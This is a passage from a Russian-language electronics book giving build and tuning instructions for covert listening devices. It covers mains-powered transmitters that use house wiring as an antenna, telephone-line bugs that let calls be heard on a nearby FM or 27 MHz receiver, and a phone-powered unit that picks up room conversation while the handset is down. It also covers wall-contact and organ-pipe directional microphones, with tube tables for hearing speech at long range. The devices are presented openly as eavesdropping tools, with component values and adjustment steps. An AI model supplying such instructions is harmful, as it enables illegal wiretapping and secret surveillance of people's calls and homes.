ВНИМАНИЕ! При настройке и эксплуатации устройств с бестрансформаторным питанием от сети переменного тока необходимо соблюдать правила и меры безопасности, т. к, элементы устройств находятся под напряжением 220 В.

Радиопередатчик с ЧМ в диапазоне частот 1-30 МГц

Устройство, описанное ниже, может работать в диапазоне 1-30 МГц с частотной модуляцией. Для питания радиопередатчика используется электросеть 220 В. Эта же сеть используется устройством в качестве антенны. Схема радиопередатчика приведена на рис. 2.24.

Блок питания устройства собран по бестрансформаторной схеме. Напряжение сети 220 В поступает на дроссели Др1, Др2 и гасящий конденсатор С2, на котором гасится излишек напряжения. Переменное напряжение выпрямляется мостом VD1, нагрузкой которого является стабилитрон VD2 типа КС510. Пульсации напряжения сглаживаются конденсатором С3.

Модулирующий усилитель выполнен на транзисторе VT1 типа КТ315. Сигнал звуковой частоты поступает на базу этого транзистора с электретного микрофона с усилителем М1 типа МКЭ-3 или М1-Б2 "Сосна". Усиленное напряжение звуковой частоты через резистор R2 поступает на варикап VD3 типа KB109A, изменение емкости которого позволяет осуществлять частотную модуляцию.

Задающий генератор выполнен по схеме индуктивной трехточки на транзисторе VT2 типа КТЗ15. Частота генератора определяется элементами колебательного контура L1, С5, С4, VD3. Обратная связь осуществляется через конденсатор С7.

Режимы транзисторов VT1 и VT2 по постоянному току регулируются резисторами К5 и R4 соответственно. Напряжения смещения транзисторов VT1 и VT2 формируются этими резисторами и параметрическим стабилизатором, выполненным на резисторе R3, светодиоде VD4 типа АЛ307 и конденсаторе С8. Этим достигается более высокая стабильность частоты, чем при обычном включении.

Напряжение высокой частоты, промодулированное по частоте звуковым сигналом, с катушки связи L2 поступает в сеть 220 В через разделительный конденсатор С1. Конденсатор С1 уменьшает влияние напряжения сети на задающий генератор. Дроссели Др1 и Др2 исключают проникновение напряжения высокой частоты по цепям питания.

Дроссели Др1 и Др2 намотаны на ферритовых стержнях и содержат по 100 витков провода ПЭВ 0,1 мм каждый. Катушки L1 и L2 намотаны на каркасе диаметром 5 мм с подстроечным сердечником. Для диапазона 27 МГц катушка L1 имеет 10 витков с отводом от середины, намотанных проводом ПЭВ 0,3 мм. Катушка связи L2 имеет 2 витка того же провода.

Конденсаторы С1 и С2 должны быть рассчитаны на рабочее напряжение не ниже 250 В. Диодная сборка КЦ407 может быть заменена на четыре диода КД105, КД102. Вместо стабилитрона VD2 можно использовать любой другой с напряжением стабилизации 8-12 В. Светодиод VD4 типа АЛ307 можно заменить на любой светодиод или на два-три кремниевых диода, включенных в прямом направлении. При использовании кондиционных деталей и правильном монтаже настройка заключается в подстройке частоты задающего генератора конденсатором С5.

ВНИМАНИЕ! При настройке и эксплуатации устройств с бестрансформаторным питанием от сети переменного тока необходимо соблюдать правила и меры безопасности, т. к, элементы этих устройств находятся под напряжением 220В.

Сетевой низкочастотный радиопередатчик

Вышеприведенные устройства излучают высокочастотные колебания в сеть, используя провода сети в качестве антенны. Но есть и устройства, которые работают в низкочастотном диапазоне (50-300 кГц) и также использующие в качестве канала связи - электросеть или телефонную линию. Такие радиопередатчики имеют повышенную скрытность, так как практически не излучают сигналы в окружающее пространство. Примером передачи сигналов в низкочастотном диапазоне может служить трехпрограммное проводное вещание, где 2 и 3 программы передаются на частотах 78 кГц и 120 кГц соответственно с использованием амплитудной модуляции. Приборы, питающиеся от сети переменного тока, могут длительное время передавать по ней информацию в любую точку здания и даже за его пределы.

Схема одного из таких устройств приведена на рис. 2.25.

Для передачи информации используется частотная модуляция и несущая частота, равная 95 кГц. Устройство питается от сети через бестрансформаторный блок питания. Излишек напряжения сети гасится конденсатором С1. Пониженное напряжение выпрямляется диодным мостом VD1 типа КЦ407. Резистор RЗ и конденсатор С4 образуют сглаживающий фильтр, предотвращающий проникновение колебаний несущей частоты в цепи питания устройства. Напряжение ограничивается до необходимой величины стабилитроном VD2 типа КС520. Данное напряжение используется для питания усилителя мощности. Напряжение, снимаемое с параметрического стабилизатора на резисторе R6, стабилитроне VD3 и конденсаторе С7, используется для питания устройства.

Сигнал звуковой частоты, снимаемый с микрофона М1 типа М1-Б2 "Сосна", усиливается однокаскадным усилителем на транзисторе VT2 типа КТ315.

ЧМ модулятор представляет собой управляемый напряжением генератор прямоугольных импульсов. Собран он на микросхеме DD1 типа К561ЛА7. Начальную (при отсутствии напряжения звуковой частоты) частоту следования импульсов генератора устанавливают равной 95 кГц при помощи подстроечного резистора R10. При поступлении напряжения ЗЧ с делителя R9, R10 частота следования импульсов генератора начинает изменяться, т. е. модулируется напряжением ЗЧ. Модулированные колебания поступают на усилитель мощности, собранный на транзисторе VT1 типа КТ315. Нагрузкой этого транзистора служит трансформатор Т1. Первичная обмотка трансформатора совместно с конденсатором С2 образуют колебательный контур, настроенный на частоту несущей. В этом колебательном контуре прямоугольные импульсы преобразуются в синусоидальный сигнал, что исключает появление побочных гармоник в выходном сигнале. С обмотки 2 трансформатора Т1 сигнал несущей частоты через конденсаторы С1 и С3 поступает в сеть 220 В переменного тока. Такой сигнал необходимо принимать на специальный приемник (см. далее).

В устройстве использованы резисторы типа МЛТ-0,125. Резистор R10 любой малогабаритный. Конденсаторы С1 и СЗ должны быть рассчитаны на рабочее напряжение не ниже 250 В. Стабилитроны VD2 и VD3 могут иметь напряжение стабилизации 18-24 В и 6-12 В, соответственно. Микросхема DD1 может быть заменена на К176ЛА7, К564ЛА7, К1561ЛА7.

Трансформатор Т1 намотан на кольцевом ферритовом сердечнике К12х7хЗ мм марки 600НН. Первичная обмотка содержит 100 витков провода ПЭВ 0,1, вторичная обмотка - 20 витков провода в изоляции диаметром 0,15-0,3 мм. Сердечник трансформатора изолируется лакотканью или фторопластом. Обмотки также разделяются слоем изоляции.

Настройку лучше начинать с использованием источника постоянного напряжения 30 В, плюсовой провод которого подключают к точке А (устройство к сети не подключено!). Проверяют напряжение на стабилитронах VD2 и VD3. Затем закорачивают базу транзистора VT2 на общий провод и подбором сопротивления резистора R10 устанавливают частоту генератора на микросхеме DD1 равной 95 кГц (контролируется осциллографом или частотомером на резисторе R2).

Подбором конденсатора С2 добиваются получения неискаженной синусоиды на коллекторе транзистора VT1. После этого снимают перемычку с базы транзистора VT2 и убеждаются в наличии частотной модуляции.

ВНИМАНИЕ! При настройке и эксплуатации устройств с бестрансформаторным питанием от сети переменного тока необходимо соблюдать правила и меры безопасности, т. к, элементы этих устройств находятся под напряжением 220 В.

2-22.gif

Изображение: 

2-23.gif

Изображение: 

2-24.gif

Изображение: 

2-25.gif

Изображение: 

2.2. Телефонные ретрансляторы

2.2. Телефонные ретрансляторы

Телефонный радиоретранслятор с AM в диапазоне частот 27-28 МГц

Устройство, схема которого приведена ниже, представляет собой телефонный радиоретранслятор. Последний позволяет прослушивать телефонный разговор на радиоприемник диапазона 27-28 МГц с амплитуднои модуляцией. Принципиальная схема этого устройства изображена на рис. 2.26.

Устройство представляет собой маломощный однокаскадный передатчик с амплитудной модуляцией и кварцевой стабилизацией несущей частоты.

Задающий генератор выполнен по традиционной схеме на транзисторе VT1 типа КТЗ15. Режим транзистора по постоянному току задается резисторами R2 и R3. Кварцевый резонатор ZQ1 включен между коллектором и базой транзистора VT1. Он может быть любым, на одну из частот диапазона 27-28 МГц. Контур, состоящий из катушки L2 и конденсатора СЗ, настроен на частоту кварцевого резонатора. С катушки связи L1 сигнал поступает в антенну, в качестве которой используются телефонные провода.

Дроссель Др1 служит для разделения высокочастотного и низкочастотного сигналов. Диод VD1 предохраняет устройство от выхода из строя в случае неправильного подключения. Схема подключения устройства представлена на рис. 2.27.

Передатчик подключается параллельно телефонной трубке. Когда трубка положена на рычаг, разговорный узел отключен от линии. Подключена к линии в этот момент только цепь вызывного устройства. Таким образом, до тех пор пока трубка не снята, напряжение питания на передатчик не поступает. Как только трубку снимают, к линии подключается разговорная часть. Во время разговора ток через разговорную часть меняется синхронно с речью, соответственно изменяется и напряжение в точках +Л1 и -Л1.

Изменение напряжения питания приводит к соответствующему изменению амплитуды генерируемых высокочастотных колебаний, т. е. имеет место амплитудная модуляция. В результате разговор можно слушать на расстоянии до 50 м на приемник диапазона 27-28 МГц, работающий на прием AM сигнала.

Транзистор VT1 может быть типа КТ316, КТ3102, КТ368. Диод VD1 - КД521, КД510, Д220. Дроссель Др.1 намотан на ферритовом стержне марки 600НН диаметром 2.8 мм и длиной 14 мм, он содержит 150-200 витков провода ПЭВ 0,1 мм.

Катушки L1 и L2 намотаны на полистироловом каркасе от KB приемников диаметром 8 мм с надстроечным сердечником. Катушка L2 содержит 12 витков провода ПЭВ 0,31. Катушка связи L1 наматываетя поверх катушки L2 и содержит 3 витка того же провода.

Настройка устройства осуществляется путем настройки контура L2, СЗ на несущую частоту. При подключении следует учитывать полярность напряжения линии.

Телефонный ретранслятор УКВ диапазона с ЧМ

Устройство, описанное ниже, имеет сходство с предыдущим по способу подсоединения к телефонной линии. Устройство представляет собой маломощный передатчик, работающий в диапазоне УКВ ЧМ с использованием частотной модуляции. Дальность действия передатчика около 100 м. Принципиальная схема устройства представлена на рис. 2.28.

Особенность схемы состоит в том, что передатчик, собранный на транзисторе VT1 типа КТЗ15, питается от телефонной линии, используя ее в качестве антенны, а частотная модуляция осуществляется путем изменения емкостей переходов этого транзистора при изменении питающего напряжения.

Задающий генератор выполнен на транзисторе VT1 по схеме с общей базой. Напряжение обратной связи поступает на его эмиттер с делителя, состоящего из конденсаторов С2 и С3. Частоту задающего генератора определяют конденсаторы С2, С3, катушка L1 и межэлектродные емкости транзистора VT1. С коллектора транзистора VT1 сигнал через конденсатор С1 поступает в линию, провод которой используется в качестве антенны. Дроссель Др1 служит для разделения ВЧ и НЧ составляющих сигналов.

Подключение данного устройства к линии аналогично подключению устройства, описанного выше (см. рис. 2.27).

Катушка L1 бескаркасная, диаметром 4 мм, содержит 6-7 витков провода ПЭВ 0,3. Дроссель Др1 индуктивностью не менее 30 мкГн типа ДПМ 0.1.

Настройка передатчика заключается в подборе сопротивления резисторов R2 или R3 для получения максимального излучения. Контур передатчика настраивают растяжением или сжатием витков катушки L1 на свободный участок УКВ ЧМ диапазона.

Телефонный ретранслятор с питанием от телефонной линии

Устройство, схема которого представлена ниже, представляет собой УКВ ЧМ передатчик в радиовещательном диапазоне частот. Питается оно от телефонной линии и имеет выходную мощность около 20 мВт. Основное отличие этого устройства от описанных выше заключается в способе подсоединения к телефонной линии. В данном случае устройство подключается в разрыв одного из проводов линии в любом месте по всей длине кабеля. Принципиальная схема радиоретранслятора представлена на рис. 2.29.

Резистор R1 включается в разрыв одного из проводов телефонной сети. При снятии трубки телефонного аппарата в цепи появляется ток, который, в зависимости от типа аппарата и состояния линии, находится в пределах 10-35 мА. Этот ток, протекая через резистор R1, вызывает на нем падение напряжения порядка 4-25 В. Напряжение поступает на выпрямительную диодную сборку типа КЦ407, благодаря которой устройство может подключаться в линию без соблюдения полярности. Высокочастотная часть схемы запитывается от параметрического стабилизатора, собранного на резисторе R3, стабилитроне VD3 типа КС191 и конденсаторе С7. Стабилизатор ограничивает излишек напряжения, поступающего с диодной сборки VD1.

Задающий генератор выполнен на транзисторе VT1 типа КТ315. Работа такого генератора подробно была описана в разделе 2.2. Частотная модуляция осуществляется путем изменения емкости варикапа VD2 типа КВ109А. Модулирующее напряжение поступает из линии через последовательно включенные резистор R2 и конденсатор С1. Первый ограничивает уровень низкочастотного сигнала, второй - исключает проникновение постоянного напряжения линии в цепь модулятора.

Частотно-модулированный сигнал с катушки связи L2 поступает в антенну, в качестве которой используется отрезок монтажного провода длиной, равной четверти длины волны, на которой работает передатчик.

Транзистор VT1 можно заменить на КТ3102, КТ368. Диодную сборку VD1 можно заменить на четыре диода КД102 или КД103. Стабилитрон VD3 можно использовать любой с напряжением стабилизации 6,8-10 В. Конденсатор С7 должен быть рассчитан на рабочее напряжение, большее напряжения стабилизации VD3. Катушка L1 намотана на корпусе подстроечного конденсатора С5 и содержит 7 витков провода ПЭВ 0,31 мм. Катушка L2 намотана поверх катушки L1 тем же проводом - 2 витка.

При настройке конденсаторы С3 и С5 подстраивают так, чтобы в нужном диапазоне (65-108 МГц) передавался сигнал максимально возможной мощности. Дальность действия собранного радиоретранслятора в зависимости от условий приема составляет 30-150 м.

Телефонный радиоретранслятор с ЧМ на одном транзисторе

Нижеприведенная схема имеет много общего со схемой, представленной на рис. 2.29. Основное отличие состоит в том, что частотная модуляция осуществляется не варикапом, а путем изменения параметров транзистора в зависимости от протекающего тока. Радиоретранслятор работает в диапазоне частот 65- 108 МГц и обеспечивает дальность передачи до 200 м. Принципиальная схема передатчика представлена на рис. 2.30.

Задающий генератор выполнен на транзисторе VT1 типа КТ315. Частота генератора определяется параметрами колебательного контура - индуктивностью катушки L1 и емкостью конденсатора С3.

Конденсатор С4 обеспечивает оптимальные условия возбуждения генератора. Дроссели Др1 н Др2 разделяют ВЧ и НЧ составляющие сигнала. С коллектора транзистора VT1 сигнал через конденсатор С2 поступает в антенну. В качестве антенны используется отрезок монтажного провода.

В качестве антенны можно использовать и саму линию связи (рис. 2.31). Для этого ВЧ сигнале коллектора транзистора VT1 через конденсаторы С7 и С8 поступает в точки А и В схемы, соответственно. Конденсатор С2 при этом из схемы исключается. Вместо VD1 можно использовать четыре диода типа КД102, КД510, КД522 и др.

Транзистор КТ315 можно заменить на КТ3102, КТ368 и другие высокочастотные. Катушка L1 намотана на корпусе конденсатора С3 и содержит 4 витка провода ПЭВ 0,5 мм. Дроссели любые с индуктивностью 50-100 мкГн. Настройка аналогична настройке схемы на рис. 2.29.

Телефонный радиоретранслятор большой мощности с ЧМ

Передатчик, собранный по схеме, приведенной на рис. 2.32, обеспечивает большую дальность действия - до З00 м.

Работает он в диапазоне 65-108 МГц с частотной модуляцией. Автогенератор собран по обычной двухтактной схеме на транзисторах VT1 и VT2 типа КТЗ15. Частотная модуляция происходит за счет изменения напряжения в линии и, как следствие, изменения напряжения на базах транзисторов VT1 и VT2. Частота задается параметрами контура L1, С5. При изменении емкости конденсатора С5 в пределах от 8 до 30 пФ диапазон возможного изменения частоты генератора составляет от 65 до 108 МГц, при постоянной индуктивности катушки L1. Дроссель Др1 - любой индуктивности в диапазоне от 50 до 100 мкГн. Катушка L1 наматывается на корпусе подстроечного конденсатора С5 и содержит 4 витка провода ПЭВ 0,5 мм с отводом от середины. Катушка L2 намотана поверх L1 и имеет 2 витка того же провода. В качестве транзисторов VT1, VT2 можно использовать любые высокочастотные транзисторы. Стабилитрон VD2 - на напряжение 6-12 В. От него зависит мощность и диапазон девиации частоты передатчика.

Настройка производится при занятой телефонной линии путем подстройки контура L1, С5.

Радиомикрофон-радиоретранслятор с питанием от телефонной линии

Существуют радиоретрансляторы, которые позволяют прослушивать не только телефонный разговор при снятой трубке, но и разговор в помещении, где они установлены, при положенной трубке. Эти устройства маломощные, т.к. используют питание от линии и не могут потреблять ток более 1 мА. Принципиальная схема такого устройства представлена на рис. 2.33.

Выпрямительный мост VD1 типа КЦ407 подключается параллельно телефонной линии независимо от полярности напряжения в линии. Напряжение в линии при положенной трубке имеет значение около 60 В. Это напряжение прикладывается к блоку питания, который выполнен на микросхеме DA1, резисторе R1, конденсаторе С1 и транзисторах VT1 и VT2. Микросхема DA1 типа КЖ101 представляет собой стабилизатор тока, работающий при напряжениях 1,8-120 В.

Падение напряжения при протекании стабильного тока через нагрузку во время заряда конденсатора С1 ограничено аналогом низковольтного стабилитрона, собранного на транзисторах VT1 и VT2. При положенной трубке устройство работает как радиомикрофон.

Описание схемы радиомикрофона и его настройка приведены в разделе 2.1. При снятой трубке незначительное изменение тока, протекающего через нагрузку - радиомикрофон, вызывает изменение рабочей точки транзистора VT3 и, тем самым, осуществляет частотную модуляцию радиомикрофона .

Транзисторы VT1 и VT2 можно заменить на КТ315 и КТ361 соответственно. Конденсатор С1 с минимальным током утечки.

Настройка источника питания сводится к установке резистором R1 тока, протекающего через нагрузку. Ток в точке А не должен превышать 1,5 мА.

2-26.gif

Изображение: 

2-27.gif

Изображение: 

2-28.gif

Изображение: 

2-29.gif

Изображение: 

2-30.gif

Изображение: 

2-31.gif

Изображение: 

2-32.gif

Изображение: 

2-33.gif

Изображение: 

2.3. Акустические микрофоны и преобразователи

2.3. Акустические микрофоны и преобразователи

Микрофоны, как известно, преобразуют энергию звукового сигнала в электрический сигнал. В совокупности со специальными усилителями и фильтрующими элементами они могут быть использованы в качестве устройств, позволяющих получать необходимую информацию. Для этого, например, может быть создана скрытая проводная линия связи, обнаружить которую можно лишь физическим поиском, либо проводя контрольные измерения сигналов во всех проводах, имеющихся в помещении. Естественно, что методы радиоконтроля, эффективные для поиска радиопередатчиков, в данном случае не имеют смысла.

Кроме перехвата непосредственно звуковых колебаний, некоторые микрофоны, так называемые микрофоны-стетоскопы, могут очень хорошо воспринимать разнообразные звуки, распространяющиеся по строительным конструкциям здания. Их используют для прослушивания помещений сквозь стены, двери, открытые окна и форточки.

Для получения информации, идущей только с одного направления, используются узконаправленные микрофоны. В простейших из них узкая диаграмма направленности формируется за счет использования длинной трубки и микрофона, установленного в ней. Трубка маскируется под трость или зонт. В более сложных конструкциях могут использоваться несколько трубок различной длины - это так называемый микрофон органного типа. Такой микрофон способен улавливать звуки голоса на расстоянии до 1000 метров. Высокую направленность имеют также микрофоны, в которых диаграмма направленности формируется параболическим концетратором звука. Ниже приведены схемы и описания некоторых конкретных устройств.

Чувствительный микрофон с усилителем на малошумящих транзисторах

Конструирование чувствительных усилителей для прослушивания речи имеет свои особенности. Одна из практических схем микрофонного усилителя приведена на рис. 2.34.

Это устройство содержит двухкаскадный усилитель низкой частоты на малошумящих транзисторах VT1 и VT2, корректирующий фильтр на транзисторе VT3 и оконечный усилитель, собранный по двухтактной бестрансформаторной схеме, на транзисторах VT4-VT6. Акустическое усиление сигнала звуковой частоты, приведенным устройством составляет 85 дБ, начальный ток потребления - 1,8 мА, полоса усиливаемых частот - от 0,3 до 3 кГц, максимальный выходной уровень сигнала - 124 дБ.

Сигнал с микрофона М1 типа "Сосна" через конденсатор С1 поступает на базу транзистора VT1. Поскольку чувствительность усилителя звуковой частоты ограничена внутренними шумами транзисторов, то для уменьшения шумов в первых каскадах усилителя использованы малошумящие транзисторы типа КТ3102.

Усилительные каскады на транзисторах VT1 и VT2 охвачены глубокой отрицательной обратной связью, которая позволяет обеспечить устойчивую работу каскадов и более линейную АЧХ. Нагрузкой второго каскада усилителя является перемеяный резистор R3, он же является и регулятором громкости. Сложный RС-фильтр, состоящий из элементов R3, С5, R6, С6, R7, С7 отсекает "шумовые" ВЧ составляющие, принимаемые микрофоном, и оставляет только сигналы в полосе частот до 4 кГц. Этот диапазон обеспечивает наибольшую разборчивость речевой информации.

С выхода фильтра сигнал поступает на оконечный усилитель звуковой частоты, выполненный на транзисторах VT4, VT5 типа КТ315 и транзисторе VT6 типа КТЗ61. Нагрузкой усилителя служит головной телефон типа ТМ-2А или ТЭМ. Резисторы в схеме используются типа МЛТ-0,125. Резистор R3- СПЗ-41 или другой небольших габаритов.

Настройка устройства сводится к подбору сопротивлений резисторов R1 и R16 для установки напряжения в точках А и В равным половине напряжения питания.

Микрофон для обнаружения слабых акустических сигналов на специализированной микросхеме

В отличие от предыдущего устройства, собранного на дискретных элементах, предлагаемое устройство собрано на широко распространенной микросхеме типа К237УН1 и предназначено для обнаружения слабых акустических сигналов. Принципиальная схема устройства приведена на рис. 2.35.

В схеме использован электретный микрофон типа МКЭ-333. Сигнал с микрофона М1 поступает на вход микросхемы DA1 типа К237УН1, которая представляет собой усилитель низкой частоты. Усилитель включен по типовой схеме. Транзисторы VT1 типа КТ315 и VT2 типа КТ361 выполняют роль эмиттерных повторителей и служат для усиления сигнала по току. В качестве нагрузки используется телефон типа ТМ-2А.

Настройка усилителя звуковой частоты заключается в получений максимальной мощности сигнала на выходе микросхемы DA1 путем измене ния сопротивления резистора R3. Сопротивление резистора R3 подбирают таким, чтобы при номинальном напряжении питания 9 В и отсутствии сигнала звуковой частоты на входе микросхемы DA1 потенциал на выводе 1 микросхемы DA1 находился в пределах 3,75-3,85 В.

В случае неустойчивой работы усилителя, его самовозбуждения, необходимо между выходом микрофона М1 и конденсатором С2 включить резистор сопротивлением 2-68 кOм.

Устройство работоспособно в диапазоне питающих напряжений 3-9 В, потребляемый при этом ток составляет 2-6 мА. Вместо микрофона возможно подключение многовитковой катушки индуктивности. Она подключается между точками А и В схемы. Микрофон М1 и резисторы при этом отключаются. В последнем случае возможна регистрация переменных магнитных полей.

Направленный микрофон органного типа

Необходимо помнить, что микрофонный усилитель усиливает звуки, приходящие со всех сторон, и, если соотношение сигнал/шум будет недостаточным, нужно применять пространственные направляющие системы - (направленные микрофоны). В этом случае дистанционное звуковое прослушивание ведется с помощью дистанционно направленных микрофонов, имеющих очень узкую диаграмму направленности. С помощью такого микрофона можно прослушать разговор на расстоянии до 1 км в пределах прямой видимости и имеет место принцип: "поблизости никого нет, но тем не менее вас хорошо прослушивают". Использование явления резонанса звуковых волн в направленных системах приводит к увеличению уровня сигнала зауковой энергии, который поступает в микрофон.

Простой направленный микрофон представляет собой набор из семи алюминиевых трубок диаметром 10 мм. Длина трубки определяет резонансную частоту звукового сигнала. Формула для расчета длины трубок имеет следующий вид:

L = 330/2F,

где L - длина трубки в метрах; F - резонансная частота в герцах.

Исходя из вышеприведенной формулы, можно построить табл. 2.1, где N - номер трубки.

Таблица 2.1. Характеристики трубок направленного микрофона

N


1


2


3


4


5


6


7

L,мм

550

400

300

200

150

100

50

F,Гц

300

412

550

825

1100

1650

3300

 

Вариант размещения избирательной системы, составленной из направленных трубок, приведен на рис. 2.36.

Микрофон располагается в параболическом улавливателе, фокусом которого является направляющая система (рис. 2.37).

Дальнейшее усиление сигнала происходит за счет использования высокочувствительного микрофонного усилителя МУ. Этот направленный микрофон перекрывает диапазон частот от 300 Гц до 3300 Гц, т. е. основной информационный диапазон речевого сигнала.

Если необходимо получить более качественное восприятие речи, то необходимо расширить диапазон принимаемых частот. Это можно сделать путем увеличения количества резонансных трубок, например, до 37 штук. В табл. 2.2 приведены расчетные данные для использования в избирательной системе от 1 до 37 трубок.

Приведенная в табл. 2.2 резонансная система перекрывает диапазон частот от 180 Гц до 8200 Гц. Вариант размещения резонансных трубок приведен на рис. 2.38, где трубки располагаются "улиткой".

Вместо резонансной системы можно использовать параболический рефлектор диаметром от 30 до 80 см.

Таблица 2.2. Расчетные данные для использования в избирательной системе от 1 до 37 трубок

N


1


2


3


4


5


6


7


8


9


10


11


12

L,мм

920

895

870

845

820

792

770

745

720

695

670

645

F,Гц

180

184

190

195

201

208

214

222

229

237

246

256

N

13

14

15

16

17

18

19

20

21

22

23

24

L,мм

620

595

570

545

520

495

470

445

420

395

370

345

F,Гц

266

277

290

303

317

333

351

371

393

418

446

478

N


25


26


27


28


29


30


31


32


33


34


35


36


37

L,мм

320

295

270

245

220

195

170

145

120

95

70

45

20

F,Гц

516

560

611

674

750

846

971

1138

1375

1737

2357

3667

8250

 

Выносной микрофон с питанием от линии связи

Дистанционная передача информации возможна при использовании проводных линий связи, которые соединяют выносной чувствительный микрофон и оконечный усилитель. Поскольку выходной сигнал, снимаемый непосредственно с микрофона, имеет небольшую амплитуду, то передавать его по линии связи просто нецелесообразно. Это связано с тем, что на длинных соединительных проводах навалятся разного рода помехи, имеющие зцачительную амплитуду. Чтобы передавать сигнал по этим проводам, его необходимо усилить до некоторой величины. Для усиления сигнала используется чувствительный микрофонный усилитель, расположенный в непосредственной близости с микрофоном. Питание такого усилителя осуществляется по проводам линии связи.

Ниже приведена схема выносного микрофона с питанием от линии связи. В устройстве используется динамический или электромагнитный микрофон. Коэффициент усиления по напряжению усилителя, собранного по схеме рис. 2.39, составляет около 3500.

Передача сигнала может осуществляться на десятки и сотни метров. Сигнал с микрофона М1 поступает на усилитель, собранный на транзисторах VT1, VT2 и VT3. Между выходом и входом усилителя введена отрицательная обратная связь по напряжению, образованная резисторами R1, R2, R3 и конденсатором С1. При этом начальный ток, протекающий через усилитель по цепи плюс источника питания, резистор R7, постоянен и зависит от напряжения источника питания и сопротивления нагрузочного резистора R7. Сигнал, усиленный усилителем, вызывает изменение выходного тока усилителя, что приводит к изменению напряжения на нагрузке. Это напряжение поступает на усилитель звуковой частоты через конденсатор С2.

Усилитель звуковой частоты может быть использован любой. Резистор R6 нужен для согласования внутреннего сопротивления микрофонного усилителя с сопротивлением линии связи. Выпрямительный мост VD1 типа КЦ407 необходим для предотвращения выхода устройства из строя вследствие ошибочного подключения источника питания.

Транзистор VT4, включенный по схеме "аналога" стабилитрона, предотвращает скачки напряжения на усилителе в момент подключения питания. Кроме того, он позволяет получить симметричное ограничение выходного сигнала при перегрузках усилителя, что исключает появление четных гармоник, особенно неприятных для слухового восприятия.

В устройстве используются резисторы типа МЛТ-0,125 (кроме R6 и R7). Транзисторы VT1, VT4 могут быть типа КТ315, КТ312, КТ201, КТ342, КТ3102. Транзистор VT2 - КТ361, КТ345, КТ3107. Транзистор VT3 - КТ608, КТ603, КТ630, КТ626, КТ940. Диодный мост VD1 можно заменить четырьмя диодами типа КД102, КД103.

Настройка сводится к установке необходимого коэффициента усиления путем подбора сопротивления резистора R3. При изменении сопротивления резистора R3 от 0 до 20 ком можно получить коэффициент усиления от 3500 до 10.

Питание усилителя осуществляется от источника постоянного тока напряжением от 12 до 60 В. Ток, протекающий через устройство, не должен выходить за пределы 0,5-60 мА. Его значение устанавливается подбором сопротивления R7.

Если сопротивление обмотки электромагнитного или динамического микрофона М1 по постоянному току менее 600 Ом, то его желательно включить в цепь эмиттера транзистора VT1. В качестве линии связи используется экранированный-или обычный провод. В последнем случае провода желательно свить между собой.

Малогабаритный выносной микрофон с низким питающим напряжением

Схема, приведенная на рис. 2.40, в отличие от описанной выше, работает при более низком питающем напряжении.

Выносная часть устройства имеет малые размеры. Длина соединительного кабеля составляет 15-30 м.

Устройство разделено на две части. Одна из них собрана на транзисторе VT1 типа КТ315 по схеме с общим коллектором, а вторая на транзисторе VT2 по схеме с общим эмиттером. Сигнал, снимаемый с электретного микрофона с усилителем типа МКЭ-3, поступает на базу транзистора VT1. Нагрузкой этого каскада служит резистор R3, расположенный во второй части устройства. Это сопротивление необходимо для обеспечения питания входного каскада на транзисторе VT1 при минимальном количестве соединительных проводов. Сигнал, снимаемый с резистора R3, через конденсатор С3, поступает на усилитель звуковой частоты, собранный на транзисторе VT2 типа КТ315.

Обе части устройства соединены экранированным проводом. Причем, отрицательное напряжение источника питания и сигнал звуковой частоты поступают по центральной жиле провода, а положительное напряжение поступает по оплетке.

В качестве микрофона М1 можно использовать любой электретный микрофон с усилителем. Транзистор VT1 типа КТ315 лучше заменить малошумящим транзистором КТ3102. Резисторы в схеме - типа МЛТ-0,125. В качестве источника питания используется аккумуляторная батарея на напряжение 6-9 В.

Настройка устройства заключается в установке режимов работы транзисторов VT1, VT2 путем подбора сопротивлений резисторов R2 и R4, соответственно. При этом ток коллектора каждого транзистора должен быть 0,1-0,2 мА.

Выносной микрофон с усилителем, обеспечивающим дальность передачи сигнала до 100 метров

Это устройство является улучшенным вариантом предыдущего. Оно позволяет предавать сигнал на расстояние до 100 м. Изменения в предлагаемой схеме касаются микрофонного блока. Схема устройства приведена на рис. 2.41.

Транзистор VT1 типа КТ361, на базу которого через конденсатор С2 поступает сигнал с микрофона М1, вместе с резисторами R2-R4 образует однокаскадный микрофонный усилитель. Транзистор VT2 типа КТ315 является эмиттерным повторителем и выполняет функцию динамической нагрузки первого каскада. Ток, потребляемый микрофонным усилителем, не превышает 0,4-0,5 мА, так что его можно питать от источника питания усилителя звуковой частоты.

Усилитель работоспособен в интервале питающих напряжений 3-9 В. Резисторы устройства применяются типа МЛТ-0,125. Микрофон М1 - любой электретный микрофон со встроенным усилителем. Вместо транзисторов VT1 и VT2 можно использовать транзисторы типа КТ3107 и КТ3102 соответственно.

Настройка усилителя звуковой частоты состоит в установке путем подбора сопротивления резистора R3 возможно большего напряжения выходного сигнала.

Соединение микрофонного блока с основным выполняется экранированным проводом, но возможно использование и обычного провода или провода типа "лапша". При использовании длинного соединительного кабеля наблюдается ухудшение качества воспроизведения сигнала из-за больших наводок на проводах.

Выносной микрофон с питанием от трехпроводной симметричной линии связи

Как уже говорилось ранее, кабели, связывающие микрофон с основным усилителем звуковой частоты, очень часто становятся источником дополнительных шумов. Снижение уровня полезного сигнала, которое, как правило, происходит на соединительном кабеле большой длины, можно компенсировать усилителем звуковой частоты, но при этом одновременно будут усилены и шумы.

В отличие от приведенных выше схем, ниже описана схема устройства с передачей сигнала по симметричной линии. В этом случае шумы на уровне усиленного сигнала маскируются в большей степени.

Принципиальная схема микрофонного усилителя приведена на рис. 2.42.

Сигнал, снимаемый с микрофона М1 типа МКЭ-3, "Сосна", поступает на усилитель, собранный на транзисторе VT1. Коэффициент передачи каскада, выполненного на транзисторе VT1, приблизительно определяется соотношением сопротивлении резисторов R3 и R4. Сигнал, усиленный транзистором VT1, поступает на базу транзистора VT2. А так как фаза сигнала на коллекторе транзистора VT2 противоположна фазе сигнала на эмиттере, то и сигнал, поступающий в линию, тоже противофазный. Входной каскад правой части схемы, собранный на транзисторах VT3, VT4, представляет собой сумматор со сдвигом фазы на 180°. Таким образом, противофазный полезный сигнал складывается в фазе и на выходе образуется полезный сигнал с удвоенной амплитудой. А возникающие одинаковые по фазе шумы и помехи в каждом из проводов линии взаимно уничтожаются в сумматоре. Суммарный сигнал подается на базу транзистора VT5 типа КТ361. Этот каскад имеет коэффициент усиления 4. С нагрузки этого каскада, резистора R12, сигнал подается на оконечный усилитель звуковой частоты или магнитофон.

В устройстве используются резисторы типа МЛТ-0,125. Транзисторы VT1-VT3 могут быть типа КТ315 и КТ342, транзисторы VT4, VT5 - КТ361, КТ3107. В качестве микрофона М1 может быть использован любой электретный микрофон со встроенным усилителем.

